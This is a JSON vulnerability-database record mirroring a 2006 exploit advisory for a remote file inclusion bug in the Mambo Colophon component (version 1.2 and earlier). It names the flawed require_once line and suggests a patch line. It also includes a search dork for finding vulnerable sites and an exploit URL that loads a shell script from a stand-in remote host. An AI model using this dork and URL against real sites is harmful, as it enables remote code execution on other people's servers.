{"type": "seebug", "_object_types": ["robots.models.base.Bulletin", "robots.models.seebug.SeebugBulletin"], "_object_type": "robots.models.seebug.SeebugBulletin", "viewCount": 2, "enchantments": {"score": {"value": 7.5, "vector": "NONE"}, "dependencies": {"references": [], "modified": "2017-11-19T13:32:47"}, "vulnersScore": 7.5}, "reporter": "Root", "title": "Mambo Colophon Component <= 1.2 - Remote Inclusion Vulnerability", "objectVersion": "1.4", "cvelist": [], "bulletinFamily": "exploit", "sourceHref": "https://www.seebug.org/vuldb/ssvid-63757", "cvss": {"score": 0.0, "vector": "NONE"}, "references": [], "enchantments_done": [], "modified": "2014-07-01T00:00:00", "description": "No description provided by source.", "href": "https://www.seebug.org/vuldb/ssvid-63757", "history": [], "id": "SSV:63757", "status": "cve,poc", "lastseen": "2017-11-19T13:32:47", "sourceData": "\n ########### Command Mambo Colophon =&#60;1.2 ##by #Drago84#########\r\n\r\n Found By Drago84\r\nExclusive Security Italian Security\r\n\r\n This bug allows a remote atacker to execute commands via rfi\r\n\r\npage:\r\n admin.colophon.php\r\n\r\nbug:\r\n require_once(&#34;$mosConfig_absolute_path/components/com_colophon/language/$mosConfig_lang.php&#34;);\r\n\r\npath:\r\nadd in admin.colophon.php\r\ndefined( &#39;_VALID_MOS&#39; ) or die( &#39;hacking attemp.&#39; );\r\n\r\ndork: inurl:com_colophon\r\n\r\nexpl:\r\nhtttp:/www.site.it/administrator/components/com_colophon/admin.colophon.php?mosConfig_absolute_path=http://evalsite/shell.php?\r\n\r\n# milw0rm.com [2006-07-29]\r\n\n ", "published": "2014-07-01T00:00:00"}

{}